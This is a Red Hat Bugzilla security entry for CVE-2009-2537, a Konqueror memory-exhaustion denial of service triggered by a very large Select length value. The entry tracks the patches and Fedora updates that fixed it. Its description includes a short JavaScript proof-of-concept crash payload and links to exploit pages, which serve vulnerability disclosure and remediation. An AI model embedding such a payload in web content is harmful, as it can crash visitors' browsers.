Bug 512911 (CVE-2009-2537) - CVE-2009-2537 Konqueror: DoS via large length property of a Select object
Summary: CVE-2009-2537 Konqueror: DoS via large length property of a Select object
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2009-2537
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL: http://www.securityfocus.com/archive/...
Whiteboard:
Depends On: 514475 514476 514477 514478 514479
Blocks:
TreeView+ depends on / blocked
 
Reported: 2009-07-21 10:14 UTC by Jan Lieskovsky
Modified: 2019-09-29 12:30 UTC (History)
5 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2009-08-06 15:12:52 UTC


Attachments (Terms of Use)

Description Jan Lieskovsky 2009-07-21 10:14:22 UTC
Common Vulnerabilities and Exposures assigned an identifier of CVE-2009-2537 to
the following vulnerability:

KDE Konqueror allows remote attackers to cause a denial of service
(memory consumption) via a large integer value for the length property
of a Select object, a related issue to CVE-2009-1692.

References:
-----------
http://www.securityfocus.com/archive/1/archive/1/504989/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/504988/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/504969/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/505006/100/0/threaded
http://www.milw0rm.com/exploits/9160
http://www.g-sec.lu/one-bug-to-rule-them-all.html

Credit: Thierry Zoller 
-------

Proof of Concept:
----------------
<script>
function poc(o) {
e = document.createElement("select");
e.length=2147483647;
}

function go() {
poc(0);
}
</script>

URL: 
----
http://www.crashthisthing.com/select.html

Upstream patch:
---------------
http://websvn.kde.org/?view=rev&revision=1001060

Comment 1 Jaroslav Reznik 2009-07-21 11:37:34 UTC
I can confirm on KHTML 4.2.4, 3.5.4.

Comment 13 Fedora Update System 2009-07-26 08:29:33 UTC
kdelibs-4.2.4-6.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/kdelibs-4.2.4-6.fc11

Comment 14 Fedora Update System 2009-07-26 08:31:08 UTC
kdelibs-4.2.4-6.fc10 has been submitted as an update for Fedora 10.
http://admin.fedoraproject.org/updates/kdelibs-4.2.4-6.fc10

Comment 15 Fedora Update System 2009-07-26 08:35:14 UTC
kdelibs3-3.5.10-13.fc11 has been submitted as an update for Fedora 11.
http://admin.fedoraproject.org/updates/kdelibs3-3.5.10-13.fc11

Comment 16 Fedora Update System 2009-07-26 08:45:17 UTC
kdelibs3-3.5.10-13.fc10 has been submitted as an update for Fedora 10.
http://admin.fedoraproject.org/updates/kdelibs3-3.5.10-13.fc10

Comment 17 Kevin Kofler 2009-07-26 08:55:52 UTC
My backported patch against KDE 3.5.10, may be useful for the RHEL update:
http://cvs.fedoraproject.org/viewvc/rpms/kdelibs3/devel/kdelibs-3.5.10-cve-2009-2537-select-length.patch?revision=1.1&view=markup

But be warned that the only testing I did was "it compiles".

Comment 18 Fedora Update System 2009-07-28 18:23:15 UTC
kdelibs-4.2.4-6.fc11 has been pushed to the Fedora 11 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 19 Fedora Update System 2009-07-28 18:26:46 UTC
kdelibs-4.2.4-6.fc10 has been pushed to the Fedora 10 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 20 Fedora Update System 2009-07-28 18:27:27 UTC
kdelibs3-3.5.10-13.fc11 has been pushed to the Fedora 11 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 21 Fedora Update System 2009-07-28 18:28:03 UTC
kdelibs3-3.5.10-13.fc10 has been pushed to the Fedora 10 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 24 Jan Lieskovsky 2009-08-06 14:30:34 UTC
Official statement from Red Hat Security Response Team regarding this issue:
----------------------------------------------------------------------------

We do not consider a user-assisted crash of a client application such as
Konqueror to be a security issue.


Note You need to log in before you can comment on or make changes to this bug.